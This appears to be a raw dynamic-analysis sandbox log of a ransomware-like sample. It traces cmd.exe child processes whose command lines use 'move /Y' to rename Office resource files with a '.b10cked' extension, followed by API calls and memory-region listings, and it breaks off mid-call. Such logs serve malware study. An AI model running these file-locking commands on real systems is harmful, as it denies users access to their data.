GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.480] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0158.480] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0158.480] GetEnvironmentStringsW () returned 0x390218* [0158.480] FreeEnvironmentStringsW (penv=0x390218) returned 1 [0158.480] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.480] GetConsoleOutputCP () returned 0x1b5 [0158.480] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.480] GetUserDefaultLCID () returned 0x409 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfc28, cchData=128 | out: lpLCData="0") returned 2 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfc28, cchData=128 | out: lpLCData="0") returned 2 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfc28, cchData=128 | out: lpLCData="1") returned 2 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0158.481] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0158.482] GetConsoleTitleW (in: lpConsoleTitle=0x380938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.482] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.482] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0158.482] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0158.482] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0158.483] _wcsicmp (_String1="move", _String2=")") returned 68 [0158.483] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0158.483] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0158.483] _wcsicmp (_String1="IF", _String2="move") returned -4 [0158.483] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0158.483] _wcsicmp (_String1="REM", _String2="move") returned 5 [0158.483] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0158.487] GetConsoleTitleW (in: lpConsoleTitle=0x1cf920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.487] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0158.487] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0158.487] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0158.487] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0158.487] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0158.487] _wcsicmp (_String1="move", _String2="CD") returned 10 [0158.487] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0158.487] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0158.487] _wcsicmp (_String1="move", _String2="REN") returned -5 [0158.487] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0158.487] _wcsicmp (_String1="move", _String2="SET") returned -6 [0158.487] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0158.487] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0158.487] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0158.487] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0158.487] _wcsicmp (_String1="move", _String2="MD") returned 11 [0158.487] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0158.487] _wcsicmp (_String1="move", _String2="RD") returned -5 [0158.487] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0158.487] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0158.487] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0158.487] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0158.487] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0158.487] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0158.487] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0158.487] _wcsicmp (_String1="move", _String2="VER") returned -9 [0158.488] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0158.488] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0158.488] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0158.488] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0158.488] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0158.488] _wcsicmp (_String1="move", _String2="START") returned -6 [0158.488] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0158.488] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0158.488] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0158.489] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.489] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.489] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf6dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf6d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf6d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0158.491] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0158.491] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0158.491] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0158.491] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0158.491] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0158.491] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0158.491] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0158.491] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0158.491] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0158.491] _wcsicmp (_String1="PUB6IN~2.TRX", _String2=".") returned 66 [0158.491] _wcsicmp (_String1="PUB6IN~2.TRX", _String2="..") returned 66 [0158.491] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6in~2.trx")) returned 0x2020 [0158.494] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x391f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.494] SetErrorMode (uMode=0x0) returned 0x0 [0158.494] SetErrorMode (uMode=0x1) returned 0x0 [0158.494] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX", nBufferLength=0x104, lpBuffer=0x1cf064, lpFilePart=0x1cf04c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX", lpFilePart=0x1cf04c*="PUB6IN~2.TRX") returned 0x3c [0158.494] SetErrorMode (uMode=0x0) returned 0x1 [0158.495] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0158.495] _wcsicmp (_String1="PUB6IN~2.TRX", _String2=".") returned 66 [0158.495] _wcsicmp (_String1="PUB6IN~2.TRX", _String2="..") returned 66 [0158.495] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6in~2.trx")) returned 0x2020 [0158.495] SetErrorMode (uMode=0x0) returned 0x0 [0158.495] SetErrorMode (uMode=0x1) returned 0x0 [0158.495] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX", nBufferLength=0x104, lpBuffer=0x1cf4e0, lpFilePart=0x1cf278 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX", lpFilePart=0x1cf278*="PUB6IN~2.TRX") returned 0x3c [0158.495] SetErrorMode (uMode=0x0) returned 0x1 [0158.495] SetErrorMode (uMode=0x0) returned 0x0 [0158.495] SetErrorMode (uMode=0x1) returned 0x0 [0158.495] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1cf6e8, lpFilePart=0x1cf278 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked", lpFilePart=0x1cf278*="PUB6INTL.REST.trx_dll.b10cked") returned 0x4d [0158.495] SetErrorMode (uMode=0x0) returned 0x1 [0158.496] SetLastError (dwErrCode=0x0) [0158.496] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6intl.rest.trx_dll.b10cked")) returned 0xffffffff [0158.496] GetLastError () returned 0x2 [0158.496] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x1cebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cebf4) returned 0x392138 [0158.496] FindNextFileW (in: hFindFile=0x392138, lpFindFileData=0x1cebf4 | out: lpFindFileData=0x1cebf4) returned 0 [0158.497] GetLastError () returned 0x12 [0158.497] FindClose (in: hFindFile=0x392138 | out: hFindFile=0x392138) returned 1 [0158.498] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x391cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x391cc8) returned 0x392138 [0158.498] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1cee8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0158.498] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x1cee8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0158.498] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6intl.rest.trx_dll")) returned 0x2020 [0158.498] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6intl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6intl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0158.499] FindClose (in: hFindFile=0x392138 | out: hFindFile=0x392138) returned 1 [0158.499] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1cee40 | out: _Buffer=" 1") returned 9 [0158.499] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.499] GetFileType (hFile=0x7) returned 0x2 [0158.500] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0158.500] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cedcc | out: lpMode=0x1cedcc) returned 1 [0158.500] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.500] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1cee00 | out: lpConsoleScreenBufferInfo=0x1cee00) returned 1 [0158.500] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0158.501] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1cee40 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0158.501] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1cee24, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cee24*=0x1a) returned 1 [0158.501] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.501] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.501] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.501] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.501] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.501] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.502] SetConsoleInputExeNameW () returned 0x1 [0158.502] GetConsoleOutputCP () returned 0x1b5 [0158.502] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.502] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.502] exit (_Code=0) Process: id = "267" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ac0" os_pid = "0x3c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21879 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21880 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21881 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21882 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 21883 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21884 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21885 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21886 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21887 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 21888 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21889 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21890 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21891 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21892 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 21893 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 21894 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21895 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21896 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21897 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21898 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21899 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21900 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21901 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21902 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21903 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 21904 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21905 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21906 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21907 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 21908 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 21909 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 21910 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 21911 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 21912 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 330 os_tid = 0xff4 [0158.613] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fc34 | out: lpSystemTimeAsFileTime=0x24fc34*(dwLowDateTime=0x987871e0, dwHighDateTime=0x1d440a9)) [0158.613] GetCurrentProcessId () returned 0x3c4 [0158.613] GetCurrentThreadId () returned 0xff4 [0158.613] GetTickCount () returned 0x30878 [0158.613] QueryPerformanceCounter (in: lpPerformanceCount=0x24fc2c | out: lpPerformanceCount=0x24fc2c*=21540242435) returned 1 [0158.614] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0158.614] __set_app_type (_Type=0x1) [0158.614] __p__fmode () returned 0x76b331f4 [0158.614] __p__commode () returned 0x76b331fc [0158.614] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0158.615] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0158.615] GetCurrentThreadId () returned 0xff4 [0158.615] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xff4) returned 0x38 [0158.615] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.615] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0158.615] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.615] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0158.615] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fbc4 | out: phkResult=0x24fbc4*=0x0) returned 0x2 [0158.616] VirtualQuery (in: lpAddress=0x24fbfb, lpBuffer=0x24fb94, dwLength=0x1c | out: lpBuffer=0x24fb94*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.616] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fb94, dwLength=0x1c | out: lpBuffer=0x24fb94*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0158.616] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fb94, dwLength=0x1c | out: lpBuffer=0x24fb94*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0158.616] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fb94, dwLength=0x1c | out: lpBuffer=0x24fb94*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.616] VirtualQuery (in: lpAddress=0x250000, 